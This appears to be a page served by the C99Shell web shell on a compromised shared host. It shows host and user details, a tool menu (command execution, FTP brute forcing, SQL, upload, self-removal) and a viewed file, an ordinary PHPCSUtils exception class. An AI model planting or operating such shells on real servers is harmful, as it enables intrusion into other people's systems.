!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/local/wp/vendor/phpcsstandards/phpcsutils/PHPCSUtils/Exceptions/   drwxr-xr-x
Free 720 GB of 879.6 GB (81.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TestFileNotFound.php (1.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * PHPCSUtils, utility functions and classes for PHP_CodeSniffer sniff developers.
 *
 * @package   PHPCSUtils
 * @copyright 2019-2020 PHPCSUtils Contributors
 * @license   https://opensource.org/licenses/LGPL-3.0 LGPL3
 * @link      https://github.com/PHPCSStandards/PHPCSUtils
 */

namespace PHPCSUtils\Exceptions;

use BadMethodCallException;

/**
 * Exception thrown when the UtilityMethodTestCase::getTargetToken() method is run without a
 * tokenized test case file being available.
 *
 * @since 1.0.0
 */
final class TestFileNotFound extends BadMethodCallException
{

    /**
     * Create a new "test file not found" exception with a standardized text.
     *
     * @since 1.0.0
     *
     * @param string          $message  The Exception message to throw.
     * @param int             $code     The Exception code.
     * @param \Throwable|null $previous The previous exception used for the exception chaining.
     *
     * @return void
     */
    public function __construct($message = '', $code = 0, $previous = null)
    {
        if ($message === '') {
            $message = \sprintf(
                'Failed to find a tokenized test case file.%sMake sure the UtilityMethodTestCase::setUpTestFile()'
                . ' method has run before calling UtilityMethodTestCase::getTargetToken()',
                \PHP_EOL
            );
        }

        parent::__construct($message, $code, $previous);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0102 ]--